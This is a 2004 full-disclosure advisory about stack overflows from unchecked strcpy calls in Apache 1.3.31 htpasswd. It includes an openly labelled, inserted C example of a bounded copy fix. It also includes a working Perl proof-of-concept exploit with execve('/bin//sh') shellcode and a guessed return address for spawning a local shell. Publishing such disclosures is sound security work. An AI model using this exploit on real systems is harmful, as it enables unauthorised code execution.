Message-ID: <d7ff97620409160923913b127@mail.gmail.com>
Date: Thu, 16 Sep 2004 13:23:03 -0300
From: Luiz Fernando <luiz.fc@...il.com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org,
   full-disclosure@...ts.netsys.com
Subject: FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory.


**********************************************************************************************
Flow Security
foxtrot@...wsecurity.org
September 16th, 2004
Luiz Fernando Camargo
-----------------------------------------------------------------------------------------------------------------------------

Package Name: Apache htpasswd 
Vendor URL: http://www.apache.org 
Vendor Notified: Two months ago, but we got no answer. 
Date: 2004-09-16 
ID: FST-#0001 
Affected Version: 1.3.31 and prior versions. 
Risk: Execute arbitrary command, maybe evade apache chroot() 

**********************************************************************************************


[01] Package Description 
[02] The problem 
[03] Possibilities 
[04] Solution 
[05] Proof of Concept 
[06] Credits 


[01] Package Description

Since htpasswd is part of the Apache software, the description below is Apache's own.
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.

[02] The problem 

In apache/src/support/htpasswd.c we found many unchecked strcpy calls.
The user and password arguments are copied into fixed-size buffers without
any length check, which an attacker can take advantage of.


[03] Possibilities 

htpasswd is not setuid root by default, and there is no sensible reason to
make it so yourself, so these bugs cannot be exploited directly to gain root.

However, since htpasswd usually lives inside Apache's chroot environment,
the overflow can be used to get out of that chroot.

[04] Solution 

Take a good look at the strcpy calls and replace them with a bounded copy such as strncpy, checking the argument length first.
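The following is an added example, not code from the advisory or from Apache: it shows the unchecked strcpy pattern described in [02] next to a bounded replacement of the kind suggested in [04]. Buffer size, function names and the "user"/"password" argument handling are constructed for the demonstration. It also shows the caveat a plain strncpy swap misses: strncpy does not add a terminator when the source fills the buffer, so the fix still needs an explicit length check and terminator.

```c
/* Added example (hypothetical names, not htpasswd.c itself): unchecked
 * strcpy() of a command-line argument versus a bounded, length-checked copy. */
#include <stdio.h>
#include <string.h>

#define MAX_STRING_LEN 256   /* constructed fixed buffer size for the demo */

/* Vulnerable pattern: copies the whole argument regardless of its length,
 * so an argument longer than MAX_STRING_LEN-1 overruns 'user' on the stack.
 * Kept only for contrast; nothing below calls it with over-long input. */
void unchecked_copy(char user[MAX_STRING_LEN], const char *arg)
{
    strcpy(user, arg);
}

/* Hardened replacement: reject input that does not fit (rather than silently
 * truncating) and always NUL-terminate. Returns 0 on success, -1 if 'src'
 * including its terminator would not fit in 'dstsz' bytes.
 * A bare strncpy(dst, src, dstsz) would leave 'dst' unterminated whenever
 * strlen(src) >= dstsz, which is why the check and terminator are explicit. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    /* Scan at most dstsz bytes so an unterminated 'src' cannot run away. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (dstsz == 0 || n >= dstsz)
        return -1;               /* needs n+1 bytes, only dstsz available */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Mirrors the "-b user password" handling: validate both arguments before
 * they touch the fixed-size buffers. Returns 1 if both fit, 0 otherwise. */
int parse_user_pass(const char *user_arg, const char *pw_arg,
                    char user[MAX_STRING_LEN], char pw[MAX_STRING_LEN])
{
    if (bounded_copy(user, MAX_STRING_LEN, user_arg) != 0) {
        fprintf(stderr, "user name too long (max %d characters)\n",
                MAX_STRING_LEN - 1);
        return 0;
    }
    if (bounded_copy(pw, MAX_STRING_LEN, pw_arg) != 0) {
        fprintf(stderr, "password too long (max %d characters)\n",
                MAX_STRING_LEN - 1);
        return 0;
    }
    return 1;
}

int main(void)
{
    char user[MAX_STRING_LEN], pw[MAX_STRING_LEN];
    char too_long[600];                      /* constructed over-long input */

    memset(too_long, 'A', sizeof too_long - 1);
    too_long[sizeof too_long - 1] = '\0';

    if (parse_user_pass("alice", "s3cret", user, pw))
        printf("accepted: user=%s\n", user);
    if (!parse_user_pass(too_long, "s3cret", user, pw))
        printf("rejected over-long user name instead of overflowing\n");
    return 0;
}
```

The rejection path is deliberate: truncating a password or user name silently would let a different credential than the one the administrator typed into the file, so an over-long argument is an error, not something to shorten.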


[05] Proof of Concept 

-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------

#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot@...wsecurity.org

# Payload is passed to the target through an environment variable.
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

$target = "/usr/local/apache/bin/htpasswd";
# Guessed address near the top of the stack, adjusted for the environment
# and program name lengths placed above it.
$retaddr = 0xbffffffa - length($shellcode) - length($target);

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";

local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
# Over-long "user" argument followed by an over-long "password" argument,
# matching the unchecked copies described in [02].
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;

# -n: print the result instead of updating a file; -b: take the password
# from the command line.
exec("$target -nb $buffer");

-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------

[06] Credits 

Jefferson Cachinel 
Thyago Silva 
Rodrigo Rubira Branco 
Adriano Lima 
Jardir ph0enix 

cheers,
Luiz Fernando Camargo
www.flowsecurity.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html